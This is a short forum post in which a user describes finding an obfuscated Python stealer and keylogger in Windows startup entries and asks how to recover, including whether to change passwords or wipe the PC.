I found a crypto stealer and keylogger on my PC just by looking through Windows startup apps. What next?
I stumbled upon a very suspicious looking script when looking at the startup apps in the registry editor, running a python file full of obfuscated b64 encoded code. So I decoded it, found it was downloading a payload from pastebin, and eventually found after a couple more steps it would run a crypto stealer and keylogger script.
So obviously I've deleted the program and restarted my PC. But what now? I don't use crypto, so I'm fine there. I'm going to go and change all my passwords (on another device just in case), but what else should I be doing to make sure I'm in the clear? Is a full wipe of the PC needed? Malwarebytes scans don't detect anything, but they already didn't detect this when it was there, and my PC was infected for at least a few weeks based on the script's Last Modified date.